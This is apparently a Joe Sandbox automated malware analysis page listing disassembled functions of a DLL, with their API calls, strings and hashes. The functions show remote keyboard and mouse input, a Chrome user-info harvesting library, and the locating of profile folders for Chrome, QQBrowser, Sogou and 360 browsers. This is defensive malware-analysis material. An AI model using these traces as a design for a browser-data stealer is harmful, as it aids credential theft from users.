                                                          • Opcode ID: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                          • Instruction ID: 2451a04a9bde1e7bfa8f86e37c24795d67c21f324d001409fd558fbe77f3f18c
                                                          • Opcode Fuzzy Hash: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                          • Instruction Fuzzy Hash: AD515B31BC471576F234CA648C87F4A7AA4FB85F90F708611B708BE1C4D6F0F980869A
                                                          Function 10016D20 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 176librarykeyboardloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                            • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                            • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                            • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                            • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                            • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                            • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                          • SetCursorPos.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D88
                                                          • WindowFromPoint.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D90
                                                          • SetCapture.USER32(00000000,?,?,?,?,1001697A,?,?), ref: 10016D97
                                                          • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001697A,?,?), ref: 10016DAD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10016DB0
                                                          • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001697A,?,?), ref: 10016DBE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10016DC1
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10016DFA
                                                          • MapVirtualKeyA.USER32(?,00000000), ref: 10016E14
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                          • String ID: USER32.dll$keybd_event$mouse_event
                                                          • API String ID: 1441364844-718119381
                                                          • Opcode ID: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                          • Instruction ID: 9bdd7654e0fc0f02893d67ce9a41b80379b50915a00eb774664f2f349eb60d67
                                                          • Opcode Fuzzy Hash: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                          • Instruction Fuzzy Hash: C3515E3ABC0729B7F630DA64CD47F5A6A94EB49F90F314615B704BE1C1D5F0F8808A99
                                                          Function 10002CD0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 144librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                            • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D12
                                                          • LoadLibraryA.KERNEL32(CHROMEUSERINFO.dll,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D22
                                                          • GetProcAddress.KERNEL32(00000000,fnGetChromeUserInfo), ref: 10002D3E
                                                          • GetProcAddress.KERNEL32(00000000,fnDeleteChromeUserInfo), ref: 10002D4C
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E53
                                                          • LocalSize.KERNEL32(00000000), ref: 10002E5C
                                                          • LocalFree.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$AddressProc$AllocLibraryLoad$FreeSize
                                                          • String ID: CHROMEUSERINFO.dll$CHROME_NO_DATA$CHROME_UNKNOW$fnDeleteChromeUserInfo$fnGetChromeUserInfo
                                                          • API String ID: 1379963177-1650604611
                                                          • Opcode ID: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                          • Instruction ID: 13833c0b53df42460e1e6170d0b02e4772bea98369ed9403c64bee1aaa194fbe
                                                          • Opcode Fuzzy Hash: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                          • Instruction Fuzzy Hash: DF4123716002585FD728CF288C45AAF7BD5FB8A7A0F580729F90AE7780CB79DE018791
                                                          Function 1000F020 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(360se6.exe), ref: 1000F047
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F05F
                                                          • #540.MFC42 ref: 1000F069
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F09B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F0ED
                                                          • #800.MFC42 ref: 1000F101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                          • API String ID: 1983172782-1244823433
                                                          • Opcode ID: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                          • Instruction ID: e9c89288d271108546bef61020c2a1418b1faed9b041f6e65e1a09c7bde258f6
                                                          • Opcode Fuzzy Hash: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                          • Instruction Fuzzy Hash: F6216579408788ABE364DB54D942FDFB7D4EB84710F40891CF29D821D6EB74A504CBA3
                                                          Function 1000F120 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(QQBrowser.exe), ref: 1000F147
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F15F
                                                          • #540.MFC42 ref: 1000F169
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F19B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F1ED
                                                          • #800.MFC42 ref: 1000F201
                                                          Strings
                                                          • \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 1000F1A0
                                                          • C:\Users\, xrefs: 1000F195
                                                          • QQBrowser.exe, xrefs: 1000F142
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
                                                          • API String ID: 1983172782-2662846904
                                                          • Opcode ID: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                          • Instruction ID: b508ae645e237c7229c1d69a2e2dd707763a9c57ac4a9714039cccd54a056aaa
                                                          • Opcode Fuzzy Hash: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                          • Instruction Fuzzy Hash: C9216579408788ABE254DB54D942FDEB7D4EF84710F40891CF19D821D6EB74A504CBA3
                                                          Function 1000F220 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(SogouExplorer.exe), ref: 1000F247
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F25F
                                                          • #540.MFC42 ref: 1000F269
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F29B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F2ED
                                                          • #800.MFC42 ref: 1000F301
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
                                                          • API String ID: 1983172782-2055279553
                                                          • Opcode ID: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                          • Instruction ID: 7d35013b61d80cf1e9c1dfe39d441eecd520366740e00716b73819efa327f1aa
                                                          • Opcode Fuzzy Hash: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                          • Instruction Fuzzy Hash: F6218779408788ABE354DB54DD42FDBB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                          Function 1000EDE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000EE07
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EE1F
                                                          • #540.MFC42 ref: 1000EE29
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EE5B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE73
                                                          • #800.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE84
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE8E
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
